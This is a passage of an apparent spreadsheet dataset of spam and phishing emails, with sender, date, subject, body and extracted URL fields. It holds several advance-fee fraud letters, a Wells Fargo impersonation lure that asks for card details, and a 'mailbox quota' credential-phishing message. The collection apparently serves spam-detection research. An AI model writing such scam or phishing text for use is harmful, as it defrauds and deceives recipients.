subsequent disbursement since nobody is coming for it and we don't want this money to go back into Government treasury as unclaimed bill. \nThe banking law and guidelines here stipulates that if such money remained after six and half years, the money will then be transferred into Government treasury as unclaimed funds. \nI agree that 30% of this money will be for you as the foreign partner, while the balance will be for me. I will visit your country for the disbursement according to the percentages indicated above once this money gets into your account. \nPlease be honest to me and trust is our watchword in this trans action. Note this transaction is confidential and risk free. \nAs soon as you receive this mail you should contact me by return mail.Please note that all necessary arrangement for the smooth release of these funds to your yet to be provided account has been finalised. \nWe will discuss much in details when I do receive your response. Please in your response include your telephone number for easy communication between us. \nBest Regards, \nDr. Eric Morgan. \nPLEASE NOTE: \nThe material being sent to you contains PRIVILEGED AND CONFIDENTIAL information only for the use of the addressee(s) named above. \nIf the reader of this message is not the intended recipient, please note that any dissemination, distribution, or copying of this communication is prohibited. \nIt is requested that anyone who receives this communication in error notify the sender immediately by e-mail reply and destroy all copies of the tran smission received. \nThanks ! \nFROM Dr.ERIC MORGAN </t>
  </si>
  <si>
    <t>5787</t>
  </si>
  <si>
    <t>To: nan\nFrom: "Paul Thomas" &lt;postmaster@topsitez.us&gt;\nDate: Thu, 28 Nov 2002 08:56:07 -0700</t>
  </si>
  <si>
    <t>Thu, 28 Nov 2002 08:56:07 -0700</t>
  </si>
  <si>
    <t>"Paul Thomas" &lt;postmaster@topsitez.us&gt;</t>
  </si>
  <si>
    <t>Sitescooper: scoop websites onto your PalmPilot - Sitescooper</t>
  </si>
  <si>
    <t>This is a multi-part message in MIME format. ------=_NextPart_000_000B_01C238C5.A7241DF0 Content-Type: text/plain; 	charset="us-ascii" Content-Transfer-Encoding: 8bit Could you please be so kind as to renew your TopSites-us directory listing by Thursday, December 5 so we can continue to show it to our millions of users? For information on renewing please go to:  [URL]http://topsitez.us[/URL] If you cannot access our site, just let me know you want to renew by email. Your listing only cost $5 a month. If you have a questions, please go to: [URL]http://topsitez.us[/URL] If you cannot find your answer there, please let me know. I will be happy to help in any way I can. If you do not want to renew, there is no need to write; we will cancel your listing automatically.  Kind Regards, Paul Thomas To remove your address from our mailing list you can go to:  [URL]http://topsitez.us[/URL] YOUR LISTING Sitescooper: scoop websites onto your PalmPilot Sitescooper automatically retrieves the stories from several news websites, trims    off extraneous HTML, and converts them into iSilo or Palm DOC format for later    reading on-the-move. It maintains a cache, and will avoid stories you've already    read. It can handle 1-page sites, 1-page with diffing, 2- and 3-level sites as well    as My-Netscape-style RSS sites. It's also very easy to add a new site to its list.    Even if you don't have a PalmPilot, it's still handy for simple website-to-text    conversion. Site files are included for many popular news sites including Slashdot,    LWN, Freshmeat and Linux Today. [URL]http://jmason.org[/URL] Your category: [URL]http://topsitez.us[/URL] REACH A MILLION Here is what you get: 1. We will continue to list your site in the TopSites directories. 2. We will show your listing more than a million times a year (guaranteed). Let us introduce you (a million times!) People often ask, "How can you guarantee to show my listing a million times? What if I am in an unpopular category?" It does not matter! Why? AutoSearch--our patent pending tool--continually displays renewed TopSites-us listings on our users PCs 24 hours a day, seven days a week. We display TopSites-us listings more than 42 million times in an hour. That is why we can guarantee to show your listing more than a million times a year.  Save $40,000 in adverting  It would cost you up to $40,000 to display your listing a million times at sites like MSN and Altavista. Googles charges up to $200,000 depending on your category. At TopSites we charge $5 a month! Save $100 re-listing fee Please do not let your listing expire. Our editors listed you as one of the top websites in your category without charge. If your listing expires, however, you may need to pay a $100 editorial review fee to get listed again. It can take a month for our editors to authorize a listing. And they may not re-list you if there are too many listings in your category.  Only TopSites-us gives you:  * Massive Reach: We display our listings billions of times a year. We guarantee to show your listing more than a million times a year. * Cost-Effectiveness: This is the least expensive advertising you will ever buy. You want to bring lots of potential customers to your site in a cost-effective way. TopSites-us does exactly that!  * Highly Targeted Leads: TopSites-us reaches customers when they are searching for what you are selling. That means high sales and low costs. More visitors become customers!  * Highest Return on Investment: Independent research confirms that you get the highest ROI from online listings like TopSites-us. E-mail, banners and other forms of online advertising all have a lower ROI. And unlike direct mail, you pay nothing for mailing lists, printing or postage. No media buy returns better results than TopSites-us.  * No-Risk: Cancel your listing any time for any reason--no questions asked! * Hassle-Free: Change your listing anytime or even move it to a different category--for free--and your changes will instantly appear in the directory "TopSites-us is the least expensive way I have found to bring buyers to my site. I have tried other online advertising companies and you beat everyone!"  --P.A., President, Go Software (g-o.us)  "TopSites-us makes my online marketing easy. I can change my message 24 hours a day so it is always up-to-date. And everyone who sees it is a pre-qualified prospect."  --N.B., CEO, My News (my-news.org) FREQUENTLY ASKED QUESTIONS Can I change my listing? You can change your listing now or later. You can rewrite the headline and description before renewing. You can change the URL tooeven to another website.  Once we receive payment, we will send you instructions on how to change your listing whenever you like. (Theres no charge to do this.) Can I change my category?  Can I list my site in additional categories? Can I list other sites too? You can list as many sites in as many categories as you like. Each listing costs only $5 per month per category. Just go to [URL]www.topsitez.us[/URL] Click on the category links until you find the one you want (or search on your keywords). Click on the Add My Site link. Then type your listing. If your old listing was in the wrong category, you can click unsubscribe to cancel it. How much does a listing cost? Can I renew for free? It costs $5 a month to list your site in TopSites. We no longer offer any free listings. We will bill you $60 for 12 months. There are no additional costs. You can change your listing as often as you like for free. You can cancel your listing anytime and we will refund your remaining money. How do I pay?  You can pay with a U.S. check, money order or bank draft. Or you can pay by Visa, MasterCard or American Express. Simply select the option you prefer on the renewal form. (Unfortunately, we cannot cash overseas checks at this time.) Who listed us? When did our listing start? We do not know. Sorry. We only began to track listing contacts and dates this year. How much did we pay to be listed?  Originally you couldnt buy a listing--you had to wait for our editors to select you as one of the top sites in your category. Do we have a contract with you? We dont ask our customers to sign contracts for a $5 a month service. Can you call me and tell me more? We are happy to answer all your questions by email but we dont contact our customer by phone at this time. Sorry. Can I still renew after your deadline? We give our customers a month to renew so dont worry too much about the deadline. How do I see my listing? I couldnt find it when I searched. You can go to [URL]www.topsitez.us[/URL] and click on the categories until you get to /Top/Computers/Software/Operating_Systems/Linux/Projects/Internet. You can also see it at [URL]www.topsitez.us[/URL] by entering two or more keywords from your listing into our search form. Since we have more than three million listings, you probably wont find your listing by searching on only one word. And you definitely wont find it if you search on words that are not in your listing.  What keywords display my listing?  How do I change them? Every word in your listing is a keyword. Anytime someone searches on two or more words in your listing, we will display it. The only way to change your keywords is to change the headline or description of your listing. How much traffic did you send us last year? We dont know. Sorry. We are working on adding this feature. ..for more answers go to: [URL]http://topsitez.us[/URL] ------=_NextPart_000_000B_01C238C5.A7241DF0 Content-Type: text/html; 	charset="us-ascii" Content-Transfer-Encoding: 8bit Renew TOPSITES LLC 1300 Evans Avenue, San Francisco, CA 94120-7334 USA - Phone 415-294-5300 Could you please be so kind as to click on the Renew button to renew your      listing in the TopSites-us      directory listing by Thursday, December 5, if you do not mind? You can also renew your listing      on our website by clicking       renew. If you cannot access the Internet, let me know and I will renew      your listing for you. Your listing only cost US $5 (other currencies) per month per category. If you have any questions, please click FAQs.      If you cannot find your answer there, please let me know. I will be happy      to help in any way I can. Kind Regards,   Paul Thomas To remove your address from our mailing list or to cancel your      listing simply click unsubscribe.   RENEW YOUR LISTING      Category:                   List our site in the following categories:/Top/Computers/Software/Operating_Systems/Linux/Projects/Internet/Top/Computers/Software/Operating_Systems/Linux/Projects/Internet/Web/Top/Computers/Software/Operating_Systems/Linux/Projects/Internet/Email                   Headline: Cost: Your                      listing costs US $5 (other currencies) per month per category (billed annually). Refunds: Cancel anytime. We will refund the remaining                      months. Changes: You can change your headline, description                      (up to 40 words) or URL. Category: Select the categories you want by clicking                      the checkboxes. If you want us to list you in a categories                      that is not on the list, go to [URL]www.topsitez.us[/URL]                      Click on the category links until you find the one you want.                      Click on the Add My Site link. Type your listing. Cancel: To cancel your listing click unsubscribe. To pay by check: We will                      email an invoice to you. You can pay with a local check from any country. To pay by credit card. Click the credit card option                      and enter your number. We accept Visa, MasterCard and American                      Express. Problems?: Try renewing on our website by clicking                                            renew. Or just let us know by email that you want to renew.                                         Description: Sitescooper automatically retrieves the stories from several news websites, trims    off extraneous HTML, and converts them into iSilo or Palm DOC format for later    reading on-the-move. It maintains a cache, and will avoid stories you've already    read. It can handle 1-page sites, 1-page with diffing, 2- and 3-level sites as well    as My-Netscape-style RSS sites. It's also very easy to add a new site to its list.    Even if you don't have a PalmPilot, it's still handy for simple website-to-text    conversion. Site files are included for many popular news sites including Slashdot,    LWN, Freshmeat and Linux Today.  URL: Your                    name: Your                    email:                     Pay                    by:                 Check (invoice me)                   Credit card   Card                        number:   Expiry                        date: January February March April May June July August September October November December 2002 2003 2004 2005 2006   Zip/postal                        code:                                   REACH A MILLION     Here is what you get: We will continue to list your site in the TopSites directory. We will show your listing more than a million times a year (guaranteed). Let us introduce you (a million times) People often ask, "How can you guarantee to show my listing a million times?  What if I am in an unpopular category?" It does not matter! Why?     AutoSearch--our patent pending tool--continually displays     renewed TopSites-us   listings on  our users PCs 24 hours a day, seven days a week. We display TopSites-us listings  more than 42 million    times in an hour. That is why we can guarantee to show your listing more than a million    times a year.   Save $40,000 in adverting            It would cost you up to $40,000 to display your listing a million times            at sites like MSN and Altavista. Googles charges up to $200,000 depending            on your category. At TopSites we charge $5 a month! Save $100 re-listing fee           Please do not let your listing expire. Our editors listed you as one            of the top websites in your category without charge. If your listing            expires, however, you may need to pay a $100 editorial review fee to            get listed again. It can take a month for our editors to authorize a            listing. And they may not re-list you if there are too many listings            in your category.  Only TopSites-us    gives you:   Massive Reach: We display our listings billions of times a year.      We guarantee to show your listing more than a million times a year. Cost-Effectiveness: This is the least expensive  advertising            you will ever buy. You want to bring lots of potential customers      to your site in a cost-effective way. TopSites-us does exactly that!  Highly Targeted Leads: TopSites-us reaches customers when they are      searching for what you are selling. That means high sales and low costs. More      visitors become customers!  Highest Return on Investment: Independent research confirms      that you get the highest ROI from online listings like TopSites-us. E-mail,      banners and other forms of online advertising all have a lower ROI. And unlike      direct mail, you pay nothing for mailing lists, printing or postage. No media      buy returns better results than TopSites-us.  No-Risk: Cancel your listing any time for any reason--no questions      asked! Hassle-Free: Change your listing anytime or even move it      to a different category--for free--and your changes will instantly appear      in the directory     "TopSites-us is the least expensive way I have found to      bring buyers to my site. I have tried other online advertising companies and      you beat everyone!"  --P.A., President, Go      Software (g-o.us)  "TopSites-us makes my online marketing easy.        I can change my message 24 hours a day so it is always up-to-date. And        everyone who sees it is a pre-qualified prospect."  --N.B., CEO, My News (my-news.org)     FREQUENTLY ASKED QUESTIONS        Can I change my listing?             You can change your listing now or later. You can rewrite the headline              and description before renewing. You can change the URL tooeven to              another website.              Once we receive payment, we will send you instructions on how to change              your listing whenever you like. (Theres no charge to do this.)  Can I change my category?              Can I list my site in additional categories?             Can I list other sites too?             You can list as many sites in as many categories as you like. Each              listing costs only $5 per month per category. Just go to [URL]www.topsitez.us[/URL]              Click on the category links until you find the one you want (or search              on your keywords). Click on the Add My Site link. Then type your listing.              If your old listing was in the wrong category, you can click unsubscribe              to cancel it.  How much does a listing cost?             Can I renew for free?             It costs $5 a month to list your site in TopSites. We no longer offer              any free listings. We will bill you $60 for 12 months. There are no              additional costs. You can change your listing as often as you like              for free. You can cancel your listing anytime and we will refund your              remaining money.  How do I pay?               You can pay with a check from any country. (Simply convert the amount              to your local currency.) Or you can pay by Visa, MasterCard or American              Express. Simply select the option you prefer on the renewal form.  Who listed us?             When did our listing start?             We do not know. Sorry. We only began to store listing contacts and              dates this year.  How much did we pay to get listed?              Originally you couldnt buy a listingyou had to wait for our editors              to select you as one of the top sites in your category.  Do we have a contract with you? We dont do contracts for a $5 service.  Can you call me and tell me more? We are happy to answer all your questions by email but we dont              contact our customer by phone at this time. Sorry.  Can I still renew after your deadline? We give our customers a month to renew so dont worry too much              about the deadline.  How do I see my listing?             I couldnt find it when I searched.             To save you time, I have included your listing at the end of this              email. Or you can see it on our website by clicking your              listing. Or you can go to [URL]www.topsitez.us[/URL]              and click on the categories until you get to /Top/Computers/Software/Operating_Systems/Linux/Projects/Internet.             You can also see it at [URL]www.topsitez.us[/URL]              by entering two or more keywords from your listing into our search              form. Since we have more than three million listings, you probably              wont find your listing by searching on only one word. And you definitely              wont find it if you search on words that are not in your listing.                What keywords display my listing?   How do I change them?             Every word in your listing is a keyword. Anytime someone searches              on two or more words in your listing, we will display it. The only              way to change your keywords is to change the headline or description              of your listing.  How much traffic did you send us last year?             We dont know. Sorry. We are working on adding this feature.            more...     YOUR LISTING     Internet DirectorySitescooper: scoop websites onto your PalmPilot Sitescooper automatically retrieves the stories from several news websites, trims    off extraneous HTML, and converts them into iSilo or Palm DOC format for later    reading on-the-move. It maintains a cache, and will avoid stories you've already    read. It can handle 1-page sites, 1-page with diffing, 2- and 3-level sites as well    as My-Netscape-style RSS sites. It's also very easy to add a new site to its list.    Even if you don't have a PalmPilot, it's still handy for simple website-to-text    conversion. Site files are included for many popular news sites including Slashdot,    LWN, Freshmeat and Linux Today. [URL]http://jmason.org[/URL] // What is sirobot? irobot is a Perl script that downloads Web pages recursively. The main advantage    over wget is its ability to get them concurrently. Sirobot is able to continue    aborted downloads, convert absolute links to relative ones, and has a    pattern-matching filter to prevent you from downloading the whole Internet. [URL]http://www.stud.uni-karlsruhe.de[/URL] Dialin Server Setup Guide guide to setting up a Linux ppp/slip dialin server [URL]http://www.swcp.com[/URL]'s DPSFTP Source for DPSFTP: Yet another Gnome FTP client [URL]http://dpsftp.sourceforge.net[/URL] home page ftpq allows the user to spool FTP uploads whilst offline and transfer these jobs automatically on the next connection to the network. [URL]http://www.tranchant.freeserve.co.uk[/URL] systems as eZ publish is a content management system for e-commerce, e-publishing and intranets [URL]http://developer.ez.nomore[/URL]   ------=_NextPart_000_000B_01C238C5.A7241DF0--</t>
  </si>
  <si>
    <t>http://topsitez.us http://topsitez.us http://topsitez.us http://jmason.org http://topsitez.us www.topsitez.us www.topsitez.us www.topsitez.us http://topsitez.us www.topsitez.us www.topsitez.us www.topsitez.us www.topsitez.us http://jmason.org http://www.stud.uni-karlsruhe.de http://www.swcp.com http://dpsftp.sourceforge.net http://www.tranchant.freeserve.co.uk http://developer.ez.nomore</t>
  </si>
  <si>
    <t>31</t>
  </si>
  <si>
    <t>To: mbengu@37.com\nFrom: mbeki ngumeni &lt;mbengu@37.com&gt;\nDate: Thu, 28 Nov 2002 08:34:54 -0800</t>
  </si>
  <si>
    <t>Thu, 28 Nov 2002 08:34:54 -0800</t>
  </si>
  <si>
    <t>mbeki ngumeni &lt;mbengu@37.com&gt;</t>
  </si>
  <si>
    <t>mbengu@37.com</t>
  </si>
  <si>
    <t>STRICTLY CONFIDENTIAL &amp; URGENT</t>
  </si>
  <si>
    <t>Dear sir,   I am Dr.Mbeki Ngumeni, a native of Cape town in South Africa and I am an Executive Accountant with the South Africa Department of Mining &amp; Natural Resources. First and foremost, I apologize for using this medium to reach you for a transaction/business of this magnitude, but this is due to Confidentiality and prompt access reposed on this medium. Be informed that a member of the South Africa Export Promotion Council(SEPC) who was at the Government delegation to your country during a trade exhibition gave your enviable credentials/particulars to me. I have decided to seek a confidential co-operation with you in the execution of the deal described Hereunder for the benefit of all parties and hope you will keep it as a top secret because of the nature of this transaction.   Within the Department of Mining &amp; Natural Resources where I work as an Executive Accountant and with the cooperation of four other top officials, we have in our possession as overdue payment bills totaling Twenty-one Million, Five Hundred Thousand US.Dollars ($21,500,000.) which we want to transfer abroad with the assistance and cooperation of a foreign company/individual to receive the said fund on our behalf or a reliable foreign non-company account to receive such funds. More so, we are handicapped in the circumstances, as the South Africa Civil Service Code of Conduct does not allow us to operate offshore account hence your importance in the whole transaction.   This amount $21.5m represents the balance of the total contract value executed on behalf of my Department by a foreign contracting firm, which we the officials over-invoiced deliberately. Though the actual contract cost have been paid to the original contractor, leaving the balance in the tune of the said amount which we have in principles gotten approval to remit by Key tested Telegraphic Transfer (K.T.T) to any foreign bank account you will provide by filing in an application through the Ministry of Justice here in South Africa for the transfer of rights and privileges of the former contractor to you. I have the authority of my partners involved to propose that should you be willing to assist us in the transaction, your share of the sum will be 25% of the $21.5 million, 70% for us and 5% for taxation and miscellaneous expenses. The business itself is 100% safe, on your part provided you treat it with utmost secrecy and confidentiality. Also your area of specialization is not a hindrance to the successful execution of this transaction. I have reposed my confidence in you and hope that you will not disappoint me.   Endeavor to contact me immediately through my e- mail to confirm whether or not you are interested in this deal. If you are not, it will enable me scout for another foreign partner to carry out this deal.     I want to assure you that my partners and myself are in a position to make the payment of this claim possible provided you can give us a very strong Assurance and guarantee that our share will be secured and please, remember to treat this matter very confidential , because we will not comprehend with any form of exposure as we are still in active Government Service .Once again, remember that time is of great essence in this transaction. I wait in anticipation of your fullest co-operation. You can contact me through this e-mail address:- mbengu@37.com Lastly,please try to send me your telephone and fax number so     that we candiscuss in details.   Yours faithfully, Dr.Mbeki Ngumeni. ------------------------------------------------------------ [URL]http://Game.37.com[/URL]  &lt;--- Free Games [URL]http://newJoke.com[/URL]   &lt;---  J O K E S  ! ! ! --------------------------------------------------------------------- Express yourself with a super cool email address from BigMailBox.com. Hundreds of choices. It's free! [URL]http://www.bigmailbox.com[/URL] ---------------------------------------------------------------------</t>
  </si>
  <si>
    <t>http://Game.37.com http://newJoke.com http://www.bigmailbox.com</t>
  </si>
  <si>
    <t>5786</t>
  </si>
  <si>
    <t>To: pmco811@aol.com\nFrom: cristopherwotton@netscape.net\nDate: Thu, 28 Nov 2002 08:16:22 -0500</t>
  </si>
  <si>
    <t>Thu, 28 Nov 2002 08:16:22 -0500</t>
  </si>
  <si>
    <t>cristopherwotton@netscape.net</t>
  </si>
  <si>
    <t>pmco811@aol.com</t>
  </si>
  <si>
    <t>Auto Protection</t>
  </si>
  <si>
    <t>Protect Yourself. Purchase An Extended Warranty For Your Car Before Your Existing Warranty Expires And Save Hundreds. Even if your warranty has expired, you will save 40-60 percent over the warranties offered by dealerships and it's the SAME warranty. All quotes are 100 percent free. All quotes are obligation free. Dear Friend, Car troubles always seem to happen at the worst possible time. Protect yourself and your family with a quality Extended Warranty for your car, truck, or SUV, so that a large expense cannot hit you all at once. We cover most vehicles with less than 150,000 miles. Do not buy from a dealer. Their prices are often 40-60 percent MORE! We offer fair prices and prompt, toll-free claims service. Get an Extended Warranty on your car today. YOU WILL BE SURPRISED BY HOW INEXPENSIVE THIS PROTECTION CAN BE! Warranty plans also include, for free: 1. 24-Hour Roadside Assistance 2. Rental Benefit 3. Trip Interruption Intervention 4. Extended Towing Benefit Take advantage of our special offer, before it expires, by going to: Click_Here [URL]http://redirect.metropol.dk[/URL] Sincerely, S.C. Valentine EWFC, Inc.mrcztbxlwuukwxoqgwyaszncexlqcdpeljuytjzytmeuaivyfpvcranyqyygjyaiajphjoimfahyolykergzuvbpadgopxivbdvonbalwnjrmpfhtxumhztfv __________________________________________________________________ The NEW Netscape 7.0 browser is now available. Upgrade now! [URL]http://channels.netscape.com[/URL]  Get your own FREE, personal Netscape Mail account today at [URL]http://webmail.netscape.com[/URL]</t>
  </si>
  <si>
    <t>http://redirect.metropol.dk http://channels.netscape.com http://webmail.netscape.com</t>
  </si>
  <si>
    <t>1196</t>
  </si>
  <si>
    <t>To: nan\nFrom: "WELLS-FARG0 0NLINE" &lt;lkclkckl9844uir94@inf090404904l.c090944&gt;\nDate: Thu, 28 May 2020 05:33:50 -0500 (CDT)</t>
  </si>
  <si>
    <t>Thu, 28 May 2020 05:33:50 -0500 (CDT)</t>
  </si>
  <si>
    <t>"WELLS-FARG0 0NLINE" &lt;lkclkckl9844uir94@inf090404904l.c090944&gt;</t>
  </si>
  <si>
    <t>Access Lock</t>
  </si>
  <si>
    <t>Dear Member     Recently, we discovered unusual activity or updates on your Account that we believe may be unauthorized.     For your protection, we have temporarily restricted the use of this Account until you verify the activity;     You will not be able to use the Credit / Debit Card linked to this Account for withdrawals or purchases until we hear from you.  What you need to do;     Follow the link below to have your account details verified and your access restored.      [ Get Started ]( [URL]https://atlantiscopper.com[/URL] )      Before you proceed, kindly make sure your debit/credit card is within your reach, as you will be required to verify your card details.   Sincerely,    0nline Team 2020 Dear Member   Recently, we discovered unusual activity or updates on your Account that we believe may be unauthorized.    For your protection, we have temporarily restricted the use of this Account until you verify the activity;    You will not be able to use the Credit / Debit Card linked to this Account for withdrawals or purchases until we hear from you.  What you need to do;   Follow the link below to have your account details verified and your access restored.    Get Started    Before you proceed, kindly make sure your debit/credit card is within your reach, as you will be required to verify your card details.   Sincerely,    0nline Team 2020</t>
  </si>
  <si>
    <t>https://atlantiscopper.com</t>
  </si>
  <si>
    <t>4712</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: Free Phone Calls! &lt;gintare@netzero.net&gt;\nDate: Thu, 28 Mar 2002 05:01:02 +0000</t>
  </si>
  <si>
    <t>Thu, 28 Mar 2002 05:01:02 +0000</t>
  </si>
  <si>
    <t>Free Phone Calls! &lt;gintare@netzero.net&gt;</t>
  </si>
  <si>
    <t>Welcome to www.internationafreecall.com</t>
  </si>
  <si>
    <t>Thank you for signing up for the Internationalfreecall.com mailing list.\n\nSoon we will show you how to make free international and free domestic phone calls.\n\nThe information on making free international calls will come after a short series of emails, so please wait a couple of days for the series of emails to arrive.  In the meantime, you can always opt-out at any time by clicking on the unsubscribe link at the bottom of each message.\n\nIn addition, for those who qualified for our promotion, we will show you how to receive 160 minutes of free domestic calling.\n\nFinally, for our customers who order a flat-rate calling product and wish to market this, or another one of their own businesses, I will give a free automated email follow-up system with no catches (this is a $20.00 value!)\n\nMore to come soon. Stay tuned!\n\n[URL]http://www.internationalfreecall.com[/URL]\n\nTo unsubscribe at any time, click on:\n\n[URL]http://www.internationalfreecall.com[/URL]</t>
  </si>
  <si>
    <t>http://www.internationalfreecall.com http://www.internationalfreecall.com</t>
  </si>
  <si>
    <t>3168</t>
  </si>
  <si>
    <t>To: nan\nFrom: Mr.Jonathan Mutambara &lt;rahim.attah1@virgilio.it&gt;\nDate: Thu, 28 Jun 2007 05:47:04 +0100</t>
  </si>
  <si>
    <t>Thu, 28 Jun 2007 05:47:04 +0100</t>
  </si>
  <si>
    <t>Mr.Jonathan Mutambara &lt;rahim.attah1@virgilio.it&gt;</t>
  </si>
  <si>
    <t>Re: Your Kind Response</t>
  </si>
  <si>
    <t>From: Mr.Jonathan Mutambara.\nJOHANNESBURG, SOUTH AFRICA.\nEmail: \njomutambara@fsmail.net.\nWebsites:[URL]http://www.absa.co.za[/URL]\n\nDear Friend,\n  \nLet me start by introducing myself. I am Mr.Jonathan Mutambara, In \ncharge of Credit and Foreign bills of my Bank, AMALGAMATED BANK OF \nSOUTH AFRICA (ABSA).   I  have an obscured business suggestion for you. \nOne of our accounts with a holding balance of Money Valued \n$15,000,000.00 (Fifteen Million Dollars) has been dormant and has not \nbeen operated for the past six years.  \n   \n&gt;From my investigations and \nconfirmations, the owner  of this account Mr. Andreas Schranner a \ncitizen of Germany who perished in a plane crash [Concorde Air Flight \nAF4590] with the whole passengers aboard on 31 July2000. And for your \nperusal you can view this web site:[URL]http://news.bbc.co[/URL]\nuk/1/hi/world/europe/859479.stm and since then nobody has done anything \nas  regards the claiming of this money because he has no family members \nwho are aware of the existence of the account nor the funds.\n\nAlso \nInformation from the National Immigration stated  that he was also \nsingle on entry into South Africa.\n  \nI have secretly discussed this \nmatter with some of the bank officials and we agreed to find a reliable \nforeign partner to deal with. In fact we could have done this deal \nalone but because of our position in this country as civil servants,we \nare not allowed to operate a foreign account and that would eventually \nraise an eye brows on our side during the time of transfer since we \nstill work in this bank, this is the actual reason why we required a \nsecond party or fellow who will assist us forward claims as the next of \nkin with informations which will be made available to you.\n \nThis \ntransaction is totally risk and trouble free as  the fund is legitimate \nand does not originate from  drugs, money laundering, terrorism or any \nother illegal act. \n   \nThe sharing of the fund between us, is as \nfollows; 40% of the total sum will go to you for your effort and \ncommitment to the success of this transaction. 60% for me and my \ncolleague's. \n \nForward your reply to jomutambara@fsmail.net \n  \nBest \nRegards, \nMr.Jonathan Mutambara\nEmail: jomutambara@fsmail.net \n\n\n</t>
  </si>
  <si>
    <t>http://www.absa.co.za http://news.bbc.co</t>
  </si>
  <si>
    <t>4590</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: "MRS. REGINA ROSSMAN." &lt;rossman502002@yahoo.com&gt;\nDate: Thu, 28 Jun 2001 20:38:06 +0100</t>
  </si>
  <si>
    <t>Thu, 28 Jun 2001 20:38:06 +0100</t>
  </si>
  <si>
    <t>"MRS. REGINA ROSSMAN." &lt;rossman502002@yahoo.com&gt;</t>
  </si>
  <si>
    <t>Urgent business proposal,</t>
  </si>
  <si>
    <t>MRS. REGINA ROSSMAN.\n#263 SANDTON CITY\nJOHANNESBURG,SOUTH AFRICA.\nE-MAIL: joel_rose1@mail.com\n\n\nATTN:ALHAJI\n\nWith due respect, trust and humility, I write you this\nproposal, which I believe, would be of great interest\nto you. I am Mrs. regina Rossman, the wife of late Mr.\nJoseph Rossman of blessed memory, before forces loyal\nto\nMajor Johnny Paul Koromah killed my husband; he was\nthe Director General of Gold and Mining Corporation\n(G.D.M.C.) of Sierra Leone. My husband was one of the\npeople targeted by the rebel forces. On the course of\nthe revolution in the country, prominent people were\nhijacked from their homes to an unknown destination.\n\nTwo days before his death, he managed to sneak a\nwritten message to us, explaining his condition and\nconcerning one trunk box of valuables containing\nmoney, which he concealed under the roof. He\ninstructed me to take our son and move out of Sierra\nLeone, immediately to any neighboring country. The\npowerful peace keeping force of the (ECOMOG)\nintervened to arrest the situation of mass killings by\nthe rebels, which was the order of the day.\nEventually, it resulted into full war, I became a\nwidow overnight, helpless situation, without a partner\nat the moment of calamity, and every person was\nrunning for his life. My son and I managed to escape\nto South Africa safely with the box and some documents\nof property title.\n\nThe cash involved inside the box was US$30 Million\n(Thirty Million United States Dollars). Due to fear\nand limited rights as a refugee, I deposited the items\nwith a private security company in order not to raise\nan eyebrow over the box here in South Africa in my\nsons name JOEL R. ROSSMAN. Be informed that the real\ncontent of the box was not disclosed. Meanwhile, I\nwant to travel out of South Africa entirely with this\nmoney for investment in your country because of\npolitical and economic stability and for future\nbenefit of my child.\n\n\nI want you to assist us claim this box from the\nsecurity company and get the money into your private\naccount in your country so that we can invest the\nmoney wisely. We have in mind to establish a rewarding\ninvestment and good relationship with you.\n\n\nConcerning the money, we are prepared to give you\nreasonable percentage of 30% for your kind assistance.\nAlso, we have decided to set aside 5% of the total sum\nfor expenses that might be incurred by the parties in\nthe course of the transfer both locally and\nexternally. For the interest of this business, do not\nhesitate to contact my son Mr. JOEL R. ROSSMAN on the\nabove e-mail address immediately you\nreceive this message for more information and to\nenable\nus proceed towards concluding all our arrangements. No\nother person knows about this money apart from my son\nand I. We await your most urgent response.please we\nneed your fax/phone numbers for esiear communication.\n\nThanking you for your co-operation and God bless you.\n\n\nBest regard,\n\nMRS. REGINA ROSSMAN.\n\n\n\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>4594</t>
  </si>
  <si>
    <t>To: &lt;Undisclosed Recipients@netnoteinc.com&gt;\nFrom: prin3cu34@mochamail.com\nDate: Thu, 28 Jun 2001 19:47:48 -0400</t>
  </si>
  <si>
    <t>Thu, 28 Jun 2001 19:47:48 -0400</t>
  </si>
  <si>
    <t>prin3cu34@mochamail.com</t>
  </si>
  <si>
    <t>Home loans of all types!</t>
  </si>
  <si>
    <t>We are Loan Specialists.....Tap into our huge network of Lenders!\n\nFor U.S.A. Homeowners Only\n\nInterest Rates have Dropped....Start Saving Now!\n\nWe Will Shop The Best Loan For You!\n\nAre you in debt? Need extra cash? We can get you the loan you need. Regardless \nof whether you have good or bad credit, we can help you.We specialize in First \nand Second Mortgages, including loans that other lenders turn down. Funding \nborrowers with less than perfect credit is our specialty. We have loan programs \nthat are unheard of.\n\nCLICK HERE FOR ALL DETAILS [URL]http://usuarios.tripod.es[/URL]\n\n===================================================================\nREMOVAL INSTRUCTIONS: You may automatically remove yourself from any future mailings\nby clicking here. mailto:geoposti@uole.com?subject=delete-mort</t>
  </si>
  <si>
    <t>100</t>
  </si>
  <si>
    <t>To: jose@monkey.org\nFrom: Email Administrator &lt;&gt;\nDate: Thu, 28 Jan 2016 06:04:12 +0100</t>
  </si>
  <si>
    <t>Thu, 28 Jan 2016 06:04:12 +0100</t>
  </si>
  <si>
    <t>Email Administrator &lt;&gt;</t>
  </si>
  <si>
    <t>=?utf-8?b?5pyA57WCIOitpuWRiiDnlLXlrZDpgq7ku7blrZjlgqjpmZDliLY=?=</t>
  </si>
  <si>
    <t>jose@monkey.org,  `A8v84AE{B14D9D]F2nE1 D9SEFFDO1A[FCF4`A8v84AE{B1e459Cb16`A8SEFFDeE0lD5Q8DcA5e36fF4Y1Av84u35[50AENF6 81~E7~EDO7Fu28`A8v84AE{B10C`A80081zCBS73S47~A7`A8v84AE{B14D9D002 D979g0DRA1f2FQ4D39v84002        S47~A7AE{B14D9DD9CC  N00eE6S47~A7[8Cb100C`A8v84AE{B1\06g09e48W30]E5O5C002  AENF6{A1t06T58 2015  --- This email has been checked for viruses by Avast antivirus software. [URL]https://www.avast.com[/URL] jose@monkey.org, 您的邮箱配额已满这可能会导致您的邮箱故障或您可能无法再接收更多的电子邮件要继续使用您的邮箱，您需要立即升级您的邮箱配额。 这项服务是免费的。  升级邮箱配额这里 一旦升级完成，您的邮箱将有效地工作。 邮件管理员 2015  This email has been sent from a virus-free computer protected by Avast. [URL]www.avast.com[/URL]</t>
  </si>
  <si>
    <t>481</t>
  </si>
  <si>
    <t>To: gregorykabila333@mail.bg\nFrom: gregorykabila333@mail.bg\nDate: Thu, 27 Nov 2003 01:39:01 +0200</t>
  </si>
  <si>
    <t>Thu, 27 Nov 2003 01:39:01 +0200</t>
  </si>
  <si>
    <t>gregorykabila333@mail.bg</t>
  </si>
  <si>
